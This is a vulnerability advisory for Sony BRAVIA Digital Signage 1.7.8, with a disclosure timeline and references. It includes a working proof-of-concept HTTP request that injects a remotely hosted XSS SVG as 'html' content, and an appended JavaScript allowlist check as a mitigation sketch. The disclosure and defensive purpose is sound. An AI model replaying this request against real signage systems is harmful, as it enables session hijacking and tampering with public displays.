zeroscience | Gjoko Krstic | ZSL-2020-5612
History: Dec 02, 2020 - 12:00 a.m.

Sony BRAVIA Digital Signage 1.7.8 Unauthenticated Remote File Inclusion

2020-12-02 00:00:00
Gjoko Krstic
zeroscience.mk

AI Score: 6.6 Medium (Confidence: High)

Title: Sony BRAVIA Digital Signage 1.7.8 Unauthenticated Remote File Inclusion
Advisory ID: ZSL-2020-5612
Type: Local/Remote
Impact: Cross-Site Scripting
Risk: (4/5)
Release Date: 02.12.2020

Summary

Sony’s BRAVIA Signage is an application to deliver video and still images to Pro BRAVIAs and manage the information via a network. Features include management of displays, power schedule management, content playlists, scheduled delivery management, content interrupt, and more. This cost-effective digital signage management solution is ideal for presenting attractive, informative visual content in retail spaces and hotel reception areas, visitor attractions, educational and corporate environments.

Description

BRAVIA digital signage is vulnerable to remote file inclusion (RFI): arbitrary client-side dynamic scripts (JavaScript, VBScript, HTML) can be included when adding content through the URL input for material of type html. This allows hijacking the current session of the user, executing cross-site scripting code, or changing the look of the page and modifying content on the current display.

Vendor

Sony Electronics Inc. - <https://pro.sony>

Affected Version

<=1.7.8

Tested On

Microsoft Windows Server 2012 R2
Ubuntu
NodeJS
Express

Vendor Status

[20.09.2020] Vulnerability discovered.
[15.10.2020] Submitted to Sony via Hackerone.
[20.11.2020] Vendor states that the vulnerabilities are just informative and that all the issues are working as intended.
[02.12.2020] Public security advisory released.

PoC

sonybravia_rfi.txt

Credits

Vulnerability discovered by Gjoko Krstic - <[email protected]>

References

[1] <https://www.exploit-db.com/exploits/49186>
[2] <https://packetstormsecurity.com/files/160345/>
[3] <https://exchange.xforce.ibmcloud.com/vulnerabilities/192605>
[4] <https://cxsecurity.com/issue/WLB-2020120030>
[5] <https://research-labs.net/search/exploits/sony-bravia-digital-signage-178-unauthenticated-remote-file-inclusion>

Changelog

[02.12.2020] - Initial release
[17.12.2020] - Added reference [1], [2], [3], [4] and [5]

Contact

Zero Science Lab

Web: <https://www.zeroscience.mk>
e-mail: [email protected]

Sony BRAVIA Digital Signage 1.7.8 Unauthenticated Remote File Inclusion


Vendor: Sony Electronics Inc.
Product web page: https://pro-bravia.sony.net
                  https://pro-bravia.sony.net/resources/software/bravia-signage/
                  https://pro.sony/ue_US/products/display-software
Affected version: <=1.7.8

Summary: Sony's BRAVIA Signage is an application to deliver
video and still images to Pro BRAVIAs and manage the information
via a network. Features include management of displays, power
schedule management, content playlists, scheduled delivery
management, content interrupt, and more. This cost-effective
digital signage management solution is ideal for presenting
attractive, informative visual content in retail spaces and
hotel reception areas, visitor attractions, educational and
corporate environments.

Desc: BRAVIA digital signage is vulnerable to remote file
inclusion (RFI): arbitrary client-side dynamic scripts
(JavaScript, VBScript, HTML) can be included when adding content
through the URL input for material of type html. This allows
hijacking the current session of the user, executing cross-site
scripting code, or changing the look of the page and modifying
content on the current display.

Tested on: Microsoft Windows Server 2012 R2
           Ubuntu
           NodeJS
           Express


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2020-5612
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5612.php


20.09.2020

--


Request:
--------

POST /api/content-creation?type=create&id=174ace2f9371b4 HTTP/1.1
Host: 192.168.1.20:8080
Proxy-Connection: keep-alive
Content-Length: 468
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://192.168.1.20:8080
Referer: http://192.168.1.20:8080/test.txt
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: io=RslVZVH6Dc8WsOn5AAAJ

{"material":[{"name":"http://www.zeroscience.mk/pentest/XSS.svg","type":"html"},{"name":"C:\\fakepath\\Blank.jpg","type":"jpeg"},{"name":"","type":"external_input"},{"name":"","type":""}],"layout":{"name":"assets/images/c4e7e66e.icon_layout_pattern_landscape_003.png","area":3,"direction":"landscape","layouts":[{"index":1,"width":960,"height":1080,"x":0,"y":0},{"index":2,"width":960,"height":540,"x":960,"y":0},{"index":3,"width":960,"height":540,"x":960,"y":540}]}}
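Mitigation sketch (an added example, not part of the advisory and not Sony code): since the request above places an arbitrary URL in a `material` entry of type `html`, a filtering proxy or patched handler in front of `/api/content-creation` can reject any such entry whose origin is not on an operator allowlist. The function name, the allowlisted origin and the sample bodies are assumptions made for illustration.

```javascript
// Added example: allowlist check for "html" materials in a content-creation body.
// ALLOWED_ORIGINS and checkMaterials are hypothetical names, not product code.
const ALLOWED_ORIGINS = new Set(["https://signage-content.example"]);

// Returns one { index, name, reason } record per rejected material entry.
function checkMaterials(body, allowedOrigins = ALLOWED_ORIGINS) {
  const findings = [];
  const materials = Array.isArray(body && body.material) ? body.material : [];
  materials.forEach((m, index) => {
    if (!m || m.type !== "html") return;      // only URL-backed html material
    const name = typeof m.name === "string" ? m.name.trim() : "";
    let url;
    try {
      url = new URL(name);                    // throws on empty, relative or malformed input
    } catch {
      findings.push({ index, name, reason: "not an absolute URL" });
      return;
    }
    if (url.protocol !== "https:") {
      findings.push({ index, name, reason: `scheme ${url.protocol} not allowed` });
    } else if (url.username || url.password) {
      // userinfo can make a URL look like it points at an allowlisted host
      findings.push({ index, name, reason: "credentials in URL" });
    } else if (!allowedOrigins.has(url.origin)) {
      findings.push({ index, name, reason: `origin ${url.origin} not on allowlist` });
    }
  });
  return findings;
}

// Constructed sample bodies; the first mirrors the material array in the advisory.
const advisoryBody = {
  material: [
    { name: "http://www.zeroscience.mk/pentest/XSS.svg", type: "html" },
    { name: "C:\\fakepath\\Blank.jpg", type: "jpeg" },
    { name: "", type: "external_input" },
    { name: "", type: "" },
  ],
};
const approvedBody = {
  material: [{ name: "https://signage-content.example/menu.html", type: "html" }],
};

console.log(checkMaterials(advisoryBody));
console.log(checkMaterials(approvedBody));
```

The check compares `url.origin` rather than matching substrings of the raw string, so a look-alike host or a userinfo prefix does not pass as the allowlisted origin.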
